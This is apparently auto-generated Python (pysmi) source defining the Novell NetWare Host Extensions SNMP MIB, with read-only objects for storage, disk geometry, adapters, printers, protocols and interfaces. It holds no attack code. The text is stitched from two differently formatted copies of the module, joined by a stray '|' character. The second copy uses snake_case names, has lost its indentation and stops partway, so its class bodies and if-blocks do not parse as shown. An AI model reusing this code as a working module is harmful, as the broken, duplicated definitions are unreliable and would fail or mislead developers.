if mibBuilder.loadTexts: nwhrPrinterType.setStatus('mandatory')
nwhrPrinterLocalName = MibTableColumn((1, 3, 6, 1, 4, 1, 23, 2, 27, 3, 13, 1, 3), InternationalDisplayString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: nwhrPrinterLocalName.setStatus('mandatory')
nwhrPrinterQueueName = MibTableColumn((1, 3, 6, 1, 4, 1, 23, 2, 27, 3, 13, 1, 4), InternationalDisplayString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: nwhrPrinterQueueName.setStatus('mandatory')
nwhrPrinterServerName = MibTableColumn((1, 3, 6, 1, 4, 1, 23, 2, 27, 3, 13, 1, 5), InternationalDisplayString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: nwhrPrinterServerName.setStatus('mandatory')
nwhrPrinterTransportDomain = MibTableColumn((1, 3, 6, 1, 4, 1, 23, 2, 27, 3, 13, 1, 6), TransportDomain()).setMaxAccess("readonly")
if mibBuilder.loadTexts: nwhrPrinterTransportDomain.setStatus('mandatory')
nwhrPrinterTransportAddress = MibTableColumn((1, 3, 6, 1, 4, 1, 23, 2, 27, 3, 13, 1, 7), TransportAddress()).setMaxAccess("readonly")
if mibBuilder.loadTexts: nwhrPrinterTransportAddress.setStatus('mandatory')
nwhrPrinterDeviceIndex = MibTableColumn((1, 3, 6, 1, 4, 1, 23, 2, 27, 3, 13, 1, 8), Integer32().subtype(subtypeSpec=ValueRangeConstraint(0, 2147483647))).setMaxAccess("readonly")
if mibBuilder.loadTexts: nwhrPrinterDeviceIndex.setStatus('mandatory')
nwhrLslOutPkts = MibScalar((1, 3, 6, 1, 4, 1, 23, 2, 27, 10, 1), Counter32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: nwhrLslOutPkts.setStatus('mandatory')
nwhrLslInPkts = MibScalar((1, 3, 6, 1, 4, 1, 23, 2, 27, 10, 2), Counter32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: nwhrLslInPkts.setStatus('mandatory')
nwhrLslUnclaimedPkts = MibScalar((1, 3, 6, 1, 4, 1, 23, 2, 27, 10, 3), Counter32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: nwhrLslUnclaimedPkts.setStatus('mandatory')
nwhrProtocolTable = MibTable((1, 3, 6, 1, 4, 1, 23, 2, 27, 10, 4), )
if mibBuilder.loadTexts: nwhrProtocolTable.setStatus('mandatory')
pysmiFakeCol1000 = MibTableColumn((1, 3, 6, 1, 4, 1, 23, 2, 27, 10, 4, 1) + (1000, ), Integer32())
nwhrProtocolEntry = MibTableRow((1, 3, 6, 1, 4, 1, 23, 2, 27, 10, 4, 1), ).setIndexNames((0, "NetWare-Host-Ext-MIB", "pysmiFakeCol1000"), (0, "NetWare-Host-Ext-MIB", "nwhrProtocolName"))
if mibBuilder.loadTexts: nwhrProtocolEntry.setStatus('mandatory')
nwhrProtocolName = MibTableColumn((1, 3, 6, 1, 4, 1, 23, 2, 27, 10, 4, 1, 1), InternationalDisplayString().subtype(subtypeSpec=ValueSizeConstraint(0, 20))).setMaxAccess("readonly")
if mibBuilder.loadTexts: nwhrProtocolName.setStatus('mandatory')
nwhrProtocolID = MibTableColumn((1, 3, 6, 1, 4, 1, 23, 2, 27, 10, 4, 1, 2), OctetString().subtype(subtypeSpec=ValueSizeConstraint(0, 6))).setMaxAccess("readonly")
if mibBuilder.loadTexts: nwhrProtocolID.setStatus('mandatory')
nwhrProtocolAddress = MibTableColumn((1, 3, 6, 1, 4, 1, 23, 2, 27, 10, 4, 1, 3), InternationalDisplayString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: nwhrProtocolAddress.setStatus('mandatory')
nwhrProtocolOutPkts = MibTableColumn((1, 3, 6, 1, 4, 1, 23, 2, 27, 10, 4, 1, 4), Counter32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: nwhrProtocolOutPkts.setStatus('mandatory')
nwhrProtocolInPkts = MibTableColumn((1, 3, 6, 1, 4, 1, 23, 2, 27, 10, 4, 1, 5), Counter32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: nwhrProtocolInPkts.setStatus('mandatory')
nwhrProtocolIgnoredPkts = MibTableColumn((1, 3, 6, 1, 4, 1, 23, 2, 27, 10, 4, 1, 6), Counter32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: nwhrProtocolIgnoredPkts.setStatus('mandatory')
nwhrProtocolFullName = MibTableColumn((1, 3, 6, 1, 4, 1, 23, 2, 27, 10, 4, 1, 7), InternationalDisplayString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: nwhrProtocolFullName.setStatus('mandatory')
nwhrIfTable = MibTable((1, 3, 6, 1, 4, 1, 23, 2, 27, 10, 5), )
if mibBuilder.loadTexts: nwhrIfTable.setStatus('mandatory')
pysmiFakeCol1001 = MibTableColumn((1, 3, 6, 1, 4, 1, 23, 2, 27, 10, 5, 1) + (1001, ), Integer32())
nwhrIfEntry = MibTableRow((1, 3, 6, 1, 4, 1, 23, 2, 27, 10, 5, 1), ).setIndexNames((0, "NetWare-Host-Ext-MIB", "pysmiFakeCol1001"))
if mibBuilder.loadTexts: nwhrIfEntry.setStatus('mandatory')
nwhrIfLogicalBoardNumber = MibTableColumn((1, 3, 6, 1, 4, 1, 23, 2, 27, 10, 5, 1, 1), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: nwhrIfLogicalBoardNumber.setStatus('mandatory')
nwhrIfFrameType = MibTableColumn((1, 3, 6, 1, 4, 1, 23, 2, 27, 10, 5, 1, 2), InternationalDisplayString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: nwhrIfFrameType.setStatus('mandatory')
nwhrIfLogicalBoardName = MibTableColumn((1, 3, 6, 1, 4, 1, 23, 2, 27, 10, 5, 1, 3), InternationalDisplayString().subtype(subtypeSpec=ValueSizeConstraint(0, 18))).setMaxAccess("readonly")
if mibBuilder.loadTexts: nwhrIfLogicalBoardName.setStatus('mandatory')
mibBuilder.exportSymbols("NetWare-Host-Ext-MIB", nwhrPrinterServerName=nwhrPrinterServerName, nwhrDiskStorageHeads=nwhrDiskStorageHeads, nwhrAdapterDMA1=nwhrAdapterDMA1, nwhrIfLogicalBoardName=nwhrIfLogicalBoardName, nwhrAdapterDevices=nwhrAdapterDevices, nwhrHotfixUnits=nwhrHotfixUnits, nwhrAdapterIndex=nwhrAdapterIndex, nwhrStorageMemoryPermanent=nwhrStorageMemoryPermanent, nwhrLslOutPkts=nwhrLslOutPkts, nwhrMslEntry=nwhrMslEntry, nwhrProtocolFullName=nwhrProtocolFullName, nwhrPrinterID=nwhrPrinterID, nwhrDiskStorageEntry=nwhrDiskStorageEntry, nwhrDiskStorageCylinders=nwhrDiskStorageCylinders, nwhrHotfixReserved=nwhrHotfixReserved, nwhrDeviceEntry=nwhrDeviceEntry, nwhrPhysicalPartitionType=nwhrPhysicalPartitionType, nwhrHotfixTotal=nwhrHotfixTotal, nwhrAdapterMem1=nwhrAdapterMem1, nwhrProcessorCount=nwhrProcessorCount, nwhrDiskStorageSectorsPerTrack=nwhrDiskStorageSectorsPerTrack, nwhrMslCount=nwhrMslCount, TransportAddress=TransportAddress, nwhrStorageCacheBuffers=nwhrStorageCacheBuffers, nwhrAdapterDriverMajorVer=nwhrAdapterDriverMajorVer, nwhrProtocolInPkts=nwhrProtocolInPkts, nwhrPhysicalPartitionTable=nwhrPhysicalPartitionTable, nwhrPrinterTable=nwhrPrinterTable, nwhrDeviceAdapterIndex=nwhrDeviceAdapterIndex, nwhrProtocolAddress=nwhrProtocolAddress, nwhrAdapterMem1Len=nwhrAdapterMem1Len, nwhrProtocolName=nwhrProtocolName, nwhrStorageCacheNonMovable=nwhrStorageCacheNonMovable, nwhrAdapterInterrupt1=nwhrAdapterInterrupt1, nwhrAdapterMem2Len=nwhrAdapterMem2Len, InternationalDisplayString=InternationalDisplayString, nwhrProtocolEntry=nwhrProtocolEntry, nwhrPhysicalPartitionSize=nwhrPhysicalPartitionSize, nwhrAdapterDriverDescr=nwhrAdapterDriverDescr, nwhrAdapterSlot=nwhrAdapterSlot, nwhrDeviceTable=nwhrDeviceTable, nwhrProtocolOutPkts=nwhrProtocolOutPkts, pysmiFakeCol1000=pysmiFakeCol1000, nwhrProtocolIgnoredPkts=nwhrProtocolIgnoredPkts, TransportDomain=TransportDomain, nwhrPhysicalPartitionEntry=nwhrPhysicalPartitionEntry, nwhrHotfixUsed=nwhrHotfixUsed, nwhrStorageCacheMovable=nwhrStorageCacheMovable, nwhrAdapterPort2Len=nwhrAdapterPort2Len, nwhrHotfixTable=nwhrHotfixTable, nwhrStorageDOSMemory=nwhrStorageDOSMemory, nwhrPrinterTransportDomain=nwhrPrinterTransportDomain, nwhrMslOutErrors=nwhrMslOutErrors, nwhrProtocolID=nwhrProtocolID, novell=novell, nwhrDiskStorageBlockSize=nwhrDiskStorageBlockSize, nwhrPhysicalPartitionIndex=nwhrPhysicalPartitionIndex, nwHostExtensions=nwHostExtensions, nwhrAdapterPort1Len=nwhrAdapterPort1Len, nwhrAdapterEntry=nwhrAdapterEntry, nwhrAdapterDriverMinorVer=nwhrAdapterDriverMinorVer, nwhrStorageTypes=nwhrStorageTypes, nwhrAdapterInterrupt2=nwhrAdapterInterrupt2, nwhrDiskStorageSectorSize=nwhrDiskStorageSectorSize, nwhrAdapterDMA2=nwhrAdapterDMA2, nwhrIfTable=nwhrIfTable, nwhrStorageUnclaimedMemory=nwhrStorageUnclaimedMemory, nwhrPrinterTransportAddress=nwhrPrinterTransportAddress, nwhrMslSends=nwhrMslSends, nwhrStorageVolume=nwhrStorageVolume, nwhrOdi=nwhrOdi, nwhrAdapterDescr=nwhrAdapterDescr, nwhrHotfixEntry=nwhrHotfixEntry, nwhrPrinterType=nwhrPrinterType, nwhrPhysicalPartitionDescr=nwhrPhysicalPartitionDescr, nwhrIfFrameType=nwhrIfFrameType, nwhrDeviceControllerNumber=nwhrDeviceControllerNumber, nwhrAdapterCount=nwhrAdapterCount, nwhrLslUnclaimedPkts=nwhrLslUnclaimedPkts, pysmiFakeCol1001=pysmiFakeCol1001, nwhrAdapterPort1=nwhrAdapterPort1, nwhrDeviceTypes=nwhrDeviceTypes, KBytes=KBytes, nwhrPrinterCount=nwhrPrinterCount, nwhrDeviceMirroredServerLink=nwhrDeviceMirroredServerLink, nwhrAdapterPort2=nwhrAdapterPort2, nwhrPrinterQueueName=nwhrPrinterQueueName, nwhrDevice=nwhrDevice, nwhrIfLogicalBoardNumber=nwhrIfLogicalBoardNumber, nwhrPrinterEntry=nwhrPrinterEntry, nwhrDeviceNumber=nwhrDeviceNumber, nwhrStorageIOEngineMemory=nwhrStorageIOEngineMemory, nwhrPrinterLocalName=nwhrPrinterLocalName, nwhrAdapterTable=nwhrAdapterTable, nwhrAdapterType=nwhrAdapterType, nwhrStorageCodeAndDataMemory=nwhrStorageCodeAndDataMemory, nwhrStorage=nwhrStorage, nwhrMslState=nwhrMslState, nwhrPrinterDeviceIndex=nwhrPrinterDeviceIndex, nwhrMslSpeed=nwhrMslSpeed, nwhrDiskStorageCount=nwhrDiskStorageCount, nwhrDiskStorageTable=nwhrDiskStorageTable, nwhrStorageMSEngineMemory=nwhrStorageMSEngineMemory, nwhrLslInPkts=nwhrLslInPkts, nwhrProtocolTable=nwhrProtocolTable, nwhrAdapterMem2=nwhrAdapterMem2, nwhrMslInErrors=nwhrMslInErrors, mibDoc=mibDoc, nwhrStorageMemoryAlloc=nwhrStorageMemoryAlloc, nwhrIfEntry=nwhrIfEntry, nwhrMslTable=nwhrMslTable, nwhrMslReceives=nwhrMslReceives)
| (integer, object_identifier, octet_string) = mibBuilder.importSymbols('ASN1', 'Integer', 'ObjectIdentifier', 'OctetString')
(named_values,) = mibBuilder.importSymbols('ASN1-ENUMERATION', 'NamedValues')
(value_size_constraint, constraints_intersection, single_value_constraint, constraints_union, value_range_constraint) = mibBuilder.importSymbols('ASN1-REFINEMENT', 'ValueSizeConstraint', 'ConstraintsIntersection', 'SingleValueConstraint', 'ConstraintsUnion', 'ValueRangeConstraint')
(hr_device_index,) = mibBuilder.importSymbols('HOST-RESOURCES-MIB', 'hrDeviceIndex')
(if_index,) = mibBuilder.importSymbols('IF-MIB', 'ifIndex')
(module_compliance, notification_group) = mibBuilder.importSymbols('SNMPv2-CONF', 'ModuleCompliance', 'NotificationGroup')
(module_identity, mib_scalar, mib_table, mib_table_row, mib_table_column, unsigned32, counter64, mib_identifier, bits, iso, time_ticks, integer32, gauge32, object_identity, ip_address, enterprises, notification_type, counter32) = mibBuilder.importSymbols('SNMPv2-SMI', 'ModuleIdentity', 'MibScalar', 'MibTable', 'MibTableRow', 'MibTableColumn', 'Unsigned32', 'Counter64', 'MibIdentifier', 'Bits', 'iso', 'TimeTicks', 'Integer32', 'Gauge32', 'ObjectIdentity', 'IpAddress', 'enterprises', 'NotificationType', 'Counter32')
(display_string, textual_convention) = mibBuilder.importSymbols('SNMPv2-TC', 'DisplayString', 'TextualConvention')
class Transportdomain(Integer32):
subtype_spec = Integer32.subtypeSpec + constraints_union(single_value_constraint(1, 2, 3, 4))
named_values = named_values(('noAddress', 1), ('ipx', 2), ('ip', 3), ('appleTalkDDP', 4))
class Transportaddress(OctetString):
pass
novell = mib_identifier((1, 3, 6, 1, 4, 1, 23))
mib_doc = mib_identifier((1, 3, 6, 1, 4, 1, 23, 2))
nw_host_extensions = mib_identifier((1, 3, 6, 1, 4, 1, 23, 2, 27))
nwhr_storage = mib_identifier((1, 3, 6, 1, 4, 1, 23, 2, 27, 2))
nwhr_device = mib_identifier((1, 3, 6, 1, 4, 1, 23, 2, 27, 3))
nwhr_odi = mib_identifier((1, 3, 6, 1, 4, 1, 23, 2, 27, 10))
nwhr_storage_types = mib_identifier((1, 3, 6, 1, 4, 1, 23, 2, 27, 2, 1))
nwhr_storage_volume = mib_identifier((1, 3, 6, 1, 4, 1, 23, 2, 27, 2, 1, 1))
nwhr_storage_memory_permanent = mib_identifier((1, 3, 6, 1, 4, 1, 23, 2, 27, 2, 1, 2))
nwhr_storage_memory_alloc = mib_identifier((1, 3, 6, 1, 4, 1, 23, 2, 27, 2, 1, 3))
nwhr_storage_cache_buffers = mib_identifier((1, 3, 6, 1, 4, 1, 23, 2, 27, 2, 1, 4))
nwhr_storage_cache_movable = mib_identifier((1, 3, 6, 1, 4, 1, 23, 2, 27, 2, 1, 5))
nwhr_storage_cache_non_movable = mib_identifier((1, 3, 6, 1, 4, 1, 23, 2, 27, 2, 1, 6))
nwhr_storage_code_and_data_memory = mib_identifier((1, 3, 6, 1, 4, 1, 23, 2, 27, 2, 1, 7))
nwhr_storage_dos_memory = mib_identifier((1, 3, 6, 1, 4, 1, 23, 2, 27, 2, 1, 8))
nwhr_storage_io_engine_memory = mib_identifier((1, 3, 6, 1, 4, 1, 23, 2, 27, 2, 1, 9))
nwhr_storage_ms_engine_memory = mib_identifier((1, 3, 6, 1, 4, 1, 23, 2, 27, 2, 1, 10))
nwhr_storage_unclaimed_memory = mib_identifier((1, 3, 6, 1, 4, 1, 23, 2, 27, 2, 1, 11))
nwhr_device_types = mib_identifier((1, 3, 6, 1, 4, 1, 23, 2, 27, 3, 1))
nwhr_device_mirrored_server_link = mib_identifier((1, 3, 6, 1, 4, 1, 23, 2, 27, 3, 1, 1))
class Kbytes(Integer32):
subtype_spec = Integer32.subtypeSpec + value_range_constraint(0, 2147483647)
class Internationaldisplaystring(OctetString):
pass
nwhr_device_table = mib_table((1, 3, 6, 1, 4, 1, 23, 2, 27, 3, 2))
if mibBuilder.loadTexts:
nwhrDeviceTable.setStatus('mandatory')
nwhr_device_entry = mib_table_row((1, 3, 6, 1, 4, 1, 23, 2, 27, 3, 2, 1)).setIndexNames((0, 'HOST-RESOURCES-MIB', 'hrDeviceIndex'))
if mibBuilder.loadTexts:
nwhrDeviceEntry.setStatus('mandatory')
nwhr_device_adapter_index = mib_table_column((1, 3, 6, 1, 4, 1, 23, 2, 27, 3, 2, 1, 1), integer32()).setMaxAccess('readonly')
if mibBuilder.loadTexts:
nwhrDeviceAdapterIndex.setStatus('mandatory')
nwhr_device_controller_number = mib_table_column((1, 3, 6, 1, 4, 1, 23, 2, 27, 3, 2, 1, 2), integer32()).setMaxAccess('readonly')
if mibBuilder.loadTexts:
nwhrDeviceControllerNumber.setStatus('mandatory')
nwhr_device_number = mib_table_column((1, 3, 6, 1, 4, 1, 23, 2, 27, 3, 2, 1, 3), integer32()).setMaxAccess('readonly')
if mibBuilder.loadTexts:
nwhrDeviceNumber.setStatus('mandatory')
nwhr_processor_count = mib_scalar((1, 3, 6, 1, 4, 1, 23, 2, 27, 3, 3), integer32()).setMaxAccess('readonly')
if mibBuilder.loadTexts:
nwhrProcessorCount.setStatus('mandatory')
nwhr_printer_count = mib_scalar((1, 3, 6, 1, 4, 1, 23, 2, 27, 3, 4), integer32()).setMaxAccess('readonly')
if mibBuilder.loadTexts:
nwhrPrinterCount.setStatus('mandatory')
nwhr_disk_storage_count = mib_scalar((1, 3, 6, 1, 4, 1, 23, 2, 27, 3, 5), integer32()).setMaxAccess('readonly')
if mibBuilder.loadTexts:
nwhrDiskStorageCount.setStatus('mandatory')
nwhr_disk_storage_table = mib_table((1, 3, 6, 1, 4, 1, 23, 2, 27, 3, 6))
if mibBuilder.loadTexts:
nwhrDiskStorageTable.setStatus('mandatory')
nwhr_disk_storage_entry = mib_table_row((1, 3, 6, 1, 4, 1, 23, 2, 27, 3, 6, 1)).setIndexNames((0, 'HOST-RESOURCES-MIB', 'hrDeviceIndex'))
if mibBuilder.loadTexts:
nwhrDiskStorageEntry.setStatus('mandatory')
nwhr_disk_storage_heads = mib_table_column((1, 3, 6, 1, 4, 1, 23, 2, 27, 3, 6, 1, 1), integer32()).setMaxAccess('readonly')
if mibBuilder.loadTexts:
nwhrDiskStorageHeads.setStatus('mandatory')
nwhr_disk_storage_cylinders = mib_table_column((1, 3, 6, 1, 4, 1, 23, 2, 27, 3, 6, 1, 2), integer32()).setMaxAccess('readonly')
if mibBuilder.loadTexts:
nwhrDiskStorageCylinders.setStatus('mandatory')
nwhr_disk_storage_sectors_per_track = mib_table_column((1, 3, 6, 1, 4, 1, 23, 2, 27, 3, 6, 1, 3), integer32()).setMaxAccess('readonly')
if mibBuilder.loadTexts:
nwhrDiskStorageSectorsPerTrack.setStatus('mandatory')
nwhr_disk_storage_sector_size = mib_table_column((1, 3, 6, 1, 4, 1, 23, 2, 27, 3, 6, 1, 4), integer32()).setMaxAccess('readonly')
if mibBuilder.loadTexts:
nwhrDiskStorageSectorSize.setStatus('mandatory')
nwhr_disk_storage_block_size = mib_table_column((1, 3, 6, 1, 4, 1, 23, 2, 27, 3, 6, 1, 5), integer32()).setMaxAccess('readonly')
if mibBuilder.loadTexts:
nwhrDiskStorageBlockSize.setStatus('mandatory')
nwhr_physical_partition_table = mib_table((1, 3, 6, 1, 4, 1, 23, 2, 27, 3, 7))
if mibBuilder.loadTexts:
nwhrPhysicalPartitionTable.setStatus('mandatory')
nwhr_physical_partition_entry = mib_table_row((1, 3, 6, 1, 4, 1, 23, 2, 27, 3, 7, 1)).setIndexNames((0, 'HOST-RESOURCES-MIB', 'hrDeviceIndex'), (0, 'NetWare-Host-Ext-MIB', 'nwhrPhysicalPartitionIndex'))
if mibBuilder.loadTexts:
nwhrPhysicalPartitionEntry.setStatus('mandatory')
nwhr_physical_partition_index = mib_table_column((1, 3, 6, 1, 4, 1, 23, 2, 27, 3, 7, 1, 1), integer32().subtype(subtypeSpec=value_range_constraint(0, 2147483647))).setMaxAccess('readonly')
if mibBuilder.loadTexts:
nwhrPhysicalPartitionIndex.setStatus('mandatory')
nwhr_physical_partition_type = mib_table_column((1, 3, 6, 1, 4, 1, 23, 2, 27, 3, 7, 1, 2), integer32().subtype(subtypeSpec=constraints_union(single_value_constraint(1, 2, 3, 4))).clone(namedValues=named_values(('other', 1), ('netWare', 2), ('dos', 3), ('inwDos', 4)))).setMaxAccess('readonly')
if mibBuilder.loadTexts:
nwhrPhysicalPartitionType.setStatus('mandatory')
nwhr_physical_partition_descr = mib_table_column((1, 3, 6, 1, 4, 1, 23, 2, 27, 3, 7, 1, 3), international_display_string().subtype(subtypeSpec=value_size_constraint(0, 128))).setMaxAccess('readonly')
if mibBuilder.loadTexts:
nwhrPhysicalPartitionDescr.setStatus('mandatory')
nwhr_physical_partition_size = mib_table_column((1, 3, 6, 1, 4, 1, 23, 2, 27, 3, 7, 1, 4), k_bytes()).setMaxAccess('readonly')
if mibBuilder.loadTexts:
nwhrPhysicalPartitionSize.setStatus('mandatory')
nwhr_hotfix_table = mib_table((1, 3, 6, 1, 4, 1, 23, 2, 27, 3, 8))
if mibBuilder.loadTexts:
nwhrHotfixTable.setStatus('mandatory')
nwhr_hotfix_entry = mib_table_row((1, 3, 6, 1, 4, 1, 23, 2, 27, 3, 8, 1)).setIndexNames((0, 'HOST-RESOURCES-MIB', 'hrDeviceIndex'), (0, 'NetWare-Host-Ext-MIB', 'nwhrPhysicalPartitionIndex'))
if mibBuilder.loadTexts:
nwhrHotfixEntry.setStatus('mandatory')
nwhr_hotfix_units = mib_table_column((1, 3, 6, 1, 4, 1, 23, 2, 27, 3, 8, 1, 1), integer32()).setMaxAccess('readonly')
if mibBuilder.loadTexts:
nwhrHotfixUnits.setStatus('mandatory')
nwhr_hotfix_total = mib_table_column((1, 3, 6, 1, 4, 1, 23, 2, 27, 3, 8, 1, 2), integer32()).setMaxAccess('readonly')
if mibBuilder.loadTexts:
nwhrHotfixTotal.setStatus('mandatory')
nwhr_hotfix_used = mib_table_column((1, 3, 6, 1, 4, 1, 23, 2, 27, 3, 8, 1, 3), integer32()).setMaxAccess('readonly')
if mibBuilder.loadTexts:
nwhrHotfixUsed.setStatus('mandatory')
nwhr_hotfix_reserved = mib_table_column((1, 3, 6, 1, 4, 1, 23, 2, 27, 3, 8, 1, 4), integer32()).setMaxAccess('readonly')
if mibBuilder.loadTexts:
nwhrHotfixReserved.setStatus('mandatory')
nwhr_adapter_count = mib_scalar((1, 3, 6, 1, 4, 1, 23, 2, 27, 3, 9), integer32()).setMaxAccess('readonly')
if mibBuilder.loadTexts:
nwhrAdapterCount.setStatus('mandatory')
nwhr_adapter_table = mib_table((1, 3, 6, 1, 4, 1, 23, 2, 27, 3, 10))
if mibBuilder.loadTexts:
nwhrAdapterTable.setStatus('mandatory')
nwhr_adapter_entry = mib_table_row((1, 3, 6, 1, 4, 1, 23, 2, 27, 3, 10, 1)).setIndexNames((0, 'NetWare-Host-Ext-MIB', 'nwhrAdapterIndex'))
if mibBuilder.loadTexts:
nwhrAdapterEntry.setStatus('mandatory')
nwhr_adapter_index = mib_table_column((1, 3, 6, 1, 4, 1, 23, 2, 27, 3, 10, 1, 1), integer32()).setMaxAccess('readonly')
if mibBuilder.loadTexts:
nwhrAdapterIndex.setStatus('mandatory')
nwhr_adapter_type = mib_table_column((1, 3, 6, 1, 4, 1, 23, 2, 27, 3, 10, 1, 2), object_identifier()).setMaxAccess('readonly')
if mibBuilder.loadTexts:
nwhrAdapterType.setStatus('mandatory')
nwhr_adapter_descr = mib_table_column((1, 3, 6, 1, 4, 1, 23, 2, 27, 3, 10, 1, 3), international_display_string().subtype(subtypeSpec=value_size_constraint(0, 128))).setMaxAccess('readonly')
if mibBuilder.loadTexts:
nwhrAdapterDescr.setStatus('mandatory')
nwhr_adapter_driver_descr = mib_table_column((1, 3, 6, 1, 4, 1, 23, 2, 27, 3, 10, 1, 4), international_display_string().subtype(subtypeSpec=value_size_constraint(0, 128))).setMaxAccess('readonly')
if mibBuilder.loadTexts:
nwhrAdapterDriverDescr.setStatus('mandatory')
nwhr_adapter_driver_major_ver = mib_table_column((1, 3, 6, 1, 4, 1, 23, 2, 27, 3, 10, 1, 5), integer32()).setMaxAccess('readonly')
if mibBuilder.loadTexts:
nwhrAdapterDriverMajorVer.setStatus('mandatory')
nwhr_adapter_driver_minor_ver = mib_table_column((1, 3, 6, 1, 4, 1, 23, 2, 27, 3, 10, 1, 6), integer32()).setMaxAccess('readonly')
if mibBuilder.loadTexts:
nwhrAdapterDriverMinorVer.setStatus('mandatory')
nwhr_adapter_port1 = mib_table_column((1, 3, 6, 1, 4, 1, 23, 2, 27, 3, 10, 1, 7), integer32()).setMaxAccess('readonly')
if mibBuilder.loadTexts:
nwhrAdapterPort1.setStatus('mandatory')
nwhr_adapter_port1_len = mib_table_column((1, 3, 6, 1, 4, 1, 23, 2, 27, 3, 10, 1, 8), integer32()).setMaxAccess('readonly')
if mibBuilder.loadTexts:
nwhrAdapterPort1Len.setStatus('mandatory')
nwhr_adapter_port2 = mib_table_column((1, 3, 6, 1, 4, 1, 23, 2, 27, 3, 10, 1, 9), integer32()).setMaxAccess('readonly')
if mibBuilder.loadTexts:
nwhrAdapterPort2.setStatus('mandatory')
nwhr_adapter_port2_len = mib_table_column((1, 3, 6, 1, 4, 1, 23, 2, 27, 3, 10, 1, 10), integer32()).setMaxAccess('readonly')
if mibBuilder.loadTexts:
nwhrAdapterPort2Len.setStatus('mandatory')
nwhr_adapter_mem1 = mib_table_column((1, 3, 6, 1, 4, 1, 23, 2, 27, 3, 10, 1, 11), integer32()).setMaxAccess('readonly')
if mibBuilder.loadTexts:
nwhrAdapterMem1.setStatus('mandatory')
nwhr_adapter_mem1_len = mib_table_column((1, 3, 6, 1, 4, 1, 23, 2, 27, 3, 10, 1, 12), integer32()).setMaxAccess('readonly')
if mibBuilder.loadTexts:
nwhrAdapterMem1Len.setStatus('mandatory')
nwhr_adapter_mem2 = mib_table_column((1, 3, 6, 1, 4, 1, 23, 2, 27, 3, 10, 1, 13), integer32()).setMaxAccess('readonly')
if mibBuilder.loadTexts:
nwhrAdapterMem2.setStatus('mandatory')
nwhr_adapter_mem2_len = mib_table_column((1, 3, 6, 1, 4, 1, 23, 2, 27, 3, 10, 1, 14), integer32()).setMaxAccess('readonly')
if mibBuilder.loadTexts:
nwhrAdapterMem2Len.setStatus('mandatory')
nwhr_adapter_dma1 = mib_table_column((1, 3, 6, 1, 4, 1, 23, 2, 27, 3, 10, 1, 15), integer32().subtype(subtypeSpec=value_range_constraint(0, 255))).setMaxAccess('readonly')
if mibBuilder.loadTexts:
nwhrAdapterDMA1.setStatus('mandatory')
nwhr_adapter_dma2 = mib_table_column((1, 3, 6, 1, 4, 1, 23, 2, 27, 3, 10, 1, 16), integer32().subtype(subtypeSpec=value_range_constraint(0, 255))).setMaxAccess('readonly')
if mibBuilder.loadTexts:
nwhrAdapterDMA2.setStatus('mandatory')
nwhr_adapter_interrupt1 = mib_table_column((1, 3, 6, 1, 4, 1, 23, 2, 27, 3, 10, 1, 17), integer32().subtype(subtypeSpec=value_range_constraint(0, 255))).setMaxAccess('readonly')
if mibBuilder.loadTexts:
nwhrAdapterInterrupt1.setStatus('mandatory')
nwhr_adapter_interrupt2 = mib_table_column((1, 3, 6, 1, 4, 1, 23, 2, 27, 3, 10, 1, 18), integer32().subtype(subtypeSpec=value_range_constraint(0, 255))).setMaxAccess('readonly')
if mibBuilder.loadTexts:
nwhrAdapterInterrupt2.setStatus('mandatory')
nwhr_adapter_slot = mib_table_column((1, 3, 6, 1, 4, 1, 23, 2, 27, 3, 10, 1, 19), integer32().subtype(subtypeSpec=value_range_constraint(0, 65535))).setMaxAccess('readonly')
if mibBuilder.loadTexts:
nwhrAdapterSlot.setStatus('mandatory')
nwhr_adapter_devices = mib_table_column((1, 3, 6, 1, 4, 1, 23, 2, 27, 3, 10, 1, 20), integer32()).setMaxAccess('readonly')
if mibBuilder.loadTexts:
nwhrAdapterDevices.setStatus('mandatory')
nwhr_msl_count = mib_scalar((1, 3, 6, 1, 4, 1, 23, 2, 27, 3, 11), integer32()).setMaxAccess('readonly')
if mibBuilder.loadTexts:
nwhrMslCount.setStatus('mandatory')
nwhr_msl_table = mib_table((1, 3, 6, 1, 4, 1, 23, 2, 27, 3, 12))
if mibBuilder.loadTexts:
nwhrMslTable.setStatus('mandatory')
nwhr_msl_entry = mib_table_row((1, 3, 6, 1, 4, 1, 23, 2, 27, 3, 12, 1)).setIndexNames((0, 'HOST-RESOURCES-MIB', 'hrDeviceIndex'))
if mibBuilder.loadTexts:
nwhrMslEntry.setStatus('mandatory')
nwhr_msl_state = mib_table_column((1, 3, 6, 1, 4, 1, 23, 2, 27, 3, 12, 1, 1), integer32().subtype(subtypeSpec=constraints_union(single_value_constraint(1, 2, 3, 4))).clone(namedValues=named_values(('offline', 1), ('startup', 2), ('standby', 3), ('active', 4)))).setMaxAccess('readonly')
if mibBuilder.loadTexts:
nwhrMslState.setStatus('mandatory')
nwhr_msl_speed = mib_table_column((1, 3, 6, 1, 4, 1, 23, 2, 27, 3, 12, 1, 2), integer32()).setMaxAccess('readonly')
if mibBuilder.loadTexts:
nwhrMslSpeed.setStatus('mandatory')
nwhr_msl_sends = mib_table_column((1, 3, 6, 1, 4, 1, 23, 2, 27, 3, 12, 1, 3), counter32()).setMaxAccess('readonly')
if mibBuilder.loadTexts:
nwhrMslSends.setStatus('mandatory')
nwhr_msl_receives = mib_table_column((1, 3, 6, 1, 4, 1, 23, 2, 27, 3, 12, 1, 4), counter32()).setMaxAccess('readonly')
if mibBuilder.loadTexts:
nwhrMslReceives.setStatus('mandatory')
nwhr_msl_in_errors = mib_table_column((1, 3, 6, 1, 4, 1, 23, 2, 27, 3, 12, 1, 5), counter32()).setMaxAccess('readonly')
if mibBuilder.loadTexts:
nwhrMslInErrors.setStatus('mandatory')
nwhr_msl_out_errors = mib_table_column((1, 3, 6, 1, 4, 1, 23, 2, 27, 3, 12, 1, 6), counter32()).setMaxAccess('readonly')
if mibBuilder.loadTexts:
nwhrMslOutErrors.setStatus('mandatory')
